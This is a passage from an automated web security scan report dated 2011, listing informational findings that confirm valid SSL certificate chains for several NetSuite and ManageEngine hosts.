Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

35.2. https://forms.netsuite.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.netsuite.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Jan 07 17:22:23 CST 2010
Valid to:	Mon Jan 07 17:22:23 CST 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

35.3. https://store.manageengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.manageengine.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	store.manageengine.com
Issued by:	GeoTrust Extended Validation SSL CA
Valid from:	Mon Jan 11 17:11:42 CST 2010
Valid to:	Fri Jan 13 20:12:48 CST 2012

Certificate chain #1

Issued to:	GeoTrust Extended Validation SSL CA
Issued by:	GeoTrust Primary Certification Authority
Valid from:	Tue Nov 28 18:00:00 CST 2006
Valid to:	Mon Nov 28 17:59:59 CST 2016

Certificate chain #2

Issued to:	GeoTrust Primary Certification Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Tue Nov 28 10:08:31 CST 2006
Valid to:	Tue Aug 21 10:08:31 CDT 2018

Certificate chain #3

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

35.4. https://system.netsuite.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://system.netsuite.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	system.netsuite.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Jul 08 19:00:00 CDT 2009
Valid to:	Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

35.5. https://www.manageengine.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.manageengine.com
Issued by:	RapidSSL CA
Valid from:	Mon Mar 14 03:35:25 CDT 2011
Valid to:	Tue May 15 23:54:57 CDT 2012

Certificate chain #1

Issued to:	RapidSSL CA
Issued by:	GeoTrust Global CA
Valid from:	Fri Feb 19 16:45:05 CST 2010
Valid to:	Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:	GeoTrust Global CA
Issued by:	GeoTrust Global CA
Valid from:	Mon May 20 23:00:00 CDT 2002
Valid to:	Fri May 20 23:00:00 CDT 2022

Report generated by XSS.CX at Mon Apr 25 10:22:20 CDT 2011.